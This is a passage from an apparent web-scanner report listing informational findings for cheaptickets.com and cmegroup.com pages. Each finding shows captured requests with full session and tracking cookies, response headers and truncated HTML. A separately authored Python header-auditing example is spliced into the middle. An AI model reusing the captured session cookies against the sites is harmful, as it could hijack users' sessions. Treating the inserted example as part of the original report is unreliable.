Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660; JSESSIONID=E880BFD3C49D42E3; logging=E880BFD3C49D42E3||egapp2218p.prod.orbitz.net; curr=USD; BetaGroup="10/02/2011 19:37:33|B|A|C|C|C|H|B|P|A"; TrafficGroup="10/02/2011 19:37:33|P"; myTests=%3A%7C%3A%7C%3A%7C%3A%7C%3A%7CUBP_ErrorMessaging%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMjUzMjI3fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzc6MzMgUE18IHwg; dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e33a3045525d5f4f58455e445a4a4217b9; mbox=check#true#1317602329|session#1317602268649-666039#1317604129

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:24 GMT
ETag: "30a-4adda015a1800"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:51:09 GMT
Content-Type: text/html
Cteonnt-Length: 778
Server: Apache
Date: Mon, 03 Oct 2011 00:38:11 GMT
Age: 2822
Connection: keep-alive
Content-Length: 778

<html>
   <head></head>
   <body onLoad="window.adLoaded=true;" onUnload="window.adLoaded=false;" style="background-color:transparent">
       <script type="text/javascript">
           function waitForAdURL(timeout)
...[SNIP]...

27.55. http://www.cheaptickets.com/cacheable/ad_empty.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /cacheable/ad_empty.html

Request

GET /cacheable/ad_empty.html HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660; JSESSIONID=E880BFD3C49D42E3; logging=E880BFD3C49D42E3||egapp2218p.prod.orbitz.net; curr=USD; BetaGroup="10/02/2011 19:37:33|B|A|C|C|C|H|B|P|A"; TrafficGroup="10/02/2011 19:37:33|P"; myTests=%3A%7C%3A%7C%3A%7C%3A%7C%3A%7CUBP_ErrorMessaging%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMjUzMjI3fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzc6MzMgUE18IHwg; dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e33a3045525d5f4f58455e445a4a4217b9; mbox=check#true#1317602329|session#1317602268649-666039#1317604129

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:24 GMT
ETag: "2e-4adda015a1800"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:47:42 GMT
Content-Type: text/html
ntCoent-Length: 46
Server: Apache
Date: Mon, 03 Oct 2011 00:39:28 GMT
Age: 3106
Connection: keep-alive
Content-Length: 46

<html><head></head><body>&nbsp;</body></html>

27.56. http://www.cheaptickets.com/cacheable/cedexis/radar.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /cacheable/cedexis/radar.html

Request

GET /cacheable/cedexis/radar.html HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660; JSESSIONID=E880BFD3C49D42E3; logging=E880BFD3C49D42E3||egapp2218p.prod.orbitz.net; BetaGroup="10/02/2011 19:37:33|B|A|C|C|C|H|B|P|A"; TrafficGroup="10/02/2011 19:37:33|P"; myTests=%3A%7C%3A%7C%3A%7C%3A%7C%3A%7CUBP_ErrorMessaging%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMjUzMjI3fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzc6MzMgUE18IHwg; dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e33a3045525d5f4f58455e445a4a4217b9; mbox=check#true#1317602329|session#1317602268649-666039#1317604129; curr=USD; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598702248:ss=1317598702061

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:24 GMT
ETag: "292-4adda015a1800"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:56:30 GMT
Content-Type: text/html
Cteonnt-Length: 658
Server: Apache
Date: Mon, 03 Oct 2011 00:40:18 GMT
Age: 2628
Connection: keep-alive
Content-Length: 658

<html>
   <head>
       <script type="text/javascript">
           var radarSettings = {
               zoneId: '1',
               customerId: '10325'
           };
           (function(d, w) {
               var onWindowLoaded = function() {
                   var a = docum
...[SNIP]...

27.57. http://www.cheaptickets.com/cacheable/empty.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /cacheable/empty.html

Request

GET /cacheable/empty.html HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660; JSESSIONID=E880BFD3C49D42E3; logging=E880BFD3C49D42E3||egapp2218p.prod.orbitz.net; curr=USD; BetaGroup="10/02/2011 19:37:33|B|A|C|C|C|H|B|P|A"; TrafficGroup="10/02/2011 19:37:33|P"; myTests=%3A%7C%3A%7C%3A%7C%3A%7C%3A%7CUBP_ErrorMessaging%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMjUzMjI3fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzc6MzMgUE18IHwg; dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e33a3045525d5f4f58455e445a4a4217b9; mbox=check#true#1317602329|session#1317602268649-666039#1317604129

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:24 GMT
ETag: "8-4adda015a1800"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:55:56 GMT
Content-Type: text/html
Cteonnt-Length: 8
Server: Apache
Date: Mon, 03 Oct 2011 00:38:15 GMT
Age: 2539
Connection: keep-alive
Content-Length: 8

<!-- -->

27.58. http://www.cmegroup.com/advance/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/

Request

GET /advance/ HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://spe.atdmt.com/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf?ver=1&clickTag1=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01&clickTag=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1315448948.1; __utmz=239709073.1315448948.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9275
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:39 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601599674056; path=/; max-age=1209600; domain=.cmegroup.com; version=1


<!DOCTYPE html>
<html lang="en-us" class="no-js">
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="fragment" content="!">

   
...[SNIP]...
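
Added example (not part of the XSS.CX report): a small Python auditor for captured responses of the kind recorded above. It takes the raw response text (status line, headers, blank line, body) and reports text/html responses whose Content-Type carries no charset, Set-Cookie headers lacking HttpOnly, cookies whose Expires already lies before the response's own Date header (the server is deleting the cookie, as burstnet.com does with TID, TData, CMS, CMP and __qca), and the obsolete Set-Cookie2 header (RFC 2965, obsoleted by RFC 6265, which never gained mainstream browser support). The two sample inputs are headers copied, trimmed, from the burstnet.com and cmegroup.com entries above; the function names and the wording of the findings are this example's own.

```python
"""Audit a captured HTTP/1.x response for header-level weaknesses.

Added example; not part of the scanner report it accompanies.
"""
from datetime import timezone
from email.utils import parsedate_to_datetime


def parse_response(raw):
    """Split a raw response into (status_line, headers, body).

    Headers come back as a list of (name, value) pairs so repeated
    headers such as Set-Cookie are all preserved.
    """
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def parse_http_date(value):
    """Parse an RFC 1123 date or the hyphenated Netscape cookie form
    ("Mon, 04-Jul-2011 23:58:58 GMT") into an aware UTC datetime."""
    dt = parsedate_to_datetime(value)
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)


def parse_set_cookie(value):
    """Return (cookie_name, attributes) for one Set-Cookie value.
    Attribute names are lower-cased; flag attributes map to None."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        if part:
            k, _, v = part.partition("=")
            attrs[k.strip().lower()] = v.strip() if v else None
    return name, attrs


def audit_response(raw):
    """Return a list of finding strings for one captured response."""
    _, headers, _ = parse_response(raw)
    single = {name.lower(): value for name, value in headers}
    findings = []

    ctype = single.get("content-type", "")
    if ctype.split(";")[0].strip().lower() == "text/html" and "charset=" not in ctype.lower():
        findings.append("text/html response without charset in Content-Type")

    resp_date = parse_http_date(single["date"]) if "date" in single else None

    for name, value in headers:
        if name.lower() == "set-cookie2":
            findings.append(f"obsolete Set-Cookie2 header: {value.split(';')[0]}")
            continue
        if name.lower() != "set-cookie":
            continue
        cname, attrs = parse_set_cookie(value)
        if "httponly" not in attrs:
            findings.append(f"cookie {cname} set without HttpOnly")
        expires = attrs.get("expires")
        if expires and resp_date is not None and parse_http_date(expires) < resp_date:
            findings.append(f"cookie {cname} already expired at response time (deletion)")
    return findings


# Sample inputs: headers copied (trimmed) from the burstnet.com and
# cmegroup.com entries in this report, with CRLF line ends as on the wire.
BURSTNET = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Server: Apache (Unix)",
    "Content-Type: text/html",
    "Date: Sun, 02 Oct 2011 23:58:59 GMT",
    "Set-Cookie: TID=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com",
    "Set-Cookie: /PC=0; path=/; expires=Sun, 09-Oct-2011 23:58:58 GMT",
    "Set-Cookie: /SC=0-2vc.1; path=/",
    "",
    "<!-- body omitted -->",
])

CMEGROUP = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Content-Type: text/html",
    "Date: Mon, 03 Oct 2011 00:26:39 GMT",
    "Set-Cookie2: Apache=128.241.91.4.1317601599674056; path=/; max-age=1209600; domain=.cmegroup.com; version=1",
    "",
    "<!DOCTYPE html>",
])

if __name__ == "__main__":
    for label, raw in (("burstnet", BURSTNET), ("cmegroup", CMEGROUP)):
        for finding in audit_response(raw):
            print(f"{label}: {finding}")
```

Because every response in this report was fetched over plain http://, the example does not flag a missing Secure attribute; on an https:// capture that check belongs alongside the HttpOnly one.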

27.59. http://www.cmegroup.com/advance/about.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/about.html

Request

GET /advance/about.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2993
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601606260348; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<h1>About CME Group</h1>
<p>As the world’s leading and most diverse derivatives marketplace, CME
...[SNIP]...

27.60. http://www.cmegroup.com/advance/build-1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/build-1.html

Request

GET /advance/build-1.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1792
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.7.1317601605963737; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<figure>
<div class="chart-container flash" data-swfvars="{ swf: '_files/flash/TwentyMillion.sw
...[SNIP]...

27.61. http://www.cmegroup.com/advance/build-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/build-2.html

Request

GET /advance/build-2.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1902
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601606028047; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<p>
Architects, city planners, property owners and construction companies can protect themselves from big jumps in
...[SNIP]...

27.62. http://www.cmegroup.com/advance/build.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/build.html

Request

GET /advance/build.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 91
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.20.1317601606011551; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<h1>Break new ground</h1>
</div>

27.63. http://www.cmegroup.com/advance/elements.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/elements.html

Request

GET /advance/elements.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9748
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:45 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.7.1317601605857264; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div id="elements-initial-content">
<h1>Elements of Advancement</h1>
<p>Every day, enterprises and institutions come face to f
...[SNIP]...

27.64. http://www.cmegroup.com/advance/finance-1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/finance-1.html

Request

GET /advance/finance-1.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2185
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.20.1317601606012385; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<h2>Every year, banks make loans totaling trillions of dollars. They’re not just funding projects...they.
...[SNIP]...

27.65. http://www.cmegroup.com/advance/finance-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/finance-2.html

Request

GET /advance/finance-2.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1679
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.28.1317601606022563; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<p>That’s where CME Group can help. By utilizing our financial tools, banks can reduce borrowing costs fo
...[SNIP]...

27.66. http://www.cmegroup.com/advance/finance.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/finance.html

Request

GET /advance/finance.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 100
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601606002371; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<h1>Finance new opportunities</h1>
</div>

27.67. http://www.cmegroup.com/advance/intro.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/intro.html

Request

GET /advance/intro.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 721
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:45 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601605683164; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="panel-content flash" id="intro-flash" data-swfvars="{ swf: '_files/flash/IntroQuestions.swf', width: '960', height: '470' }">
   <div class="no-flash">
       <h1>
        <span><img sr
...[SNIP]...

27.68. http://www.cmegroup.com/advance/plant-1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/plant-1.html

Request

GET /advance/plant-1.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1959
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:45 GMT
Connection: close
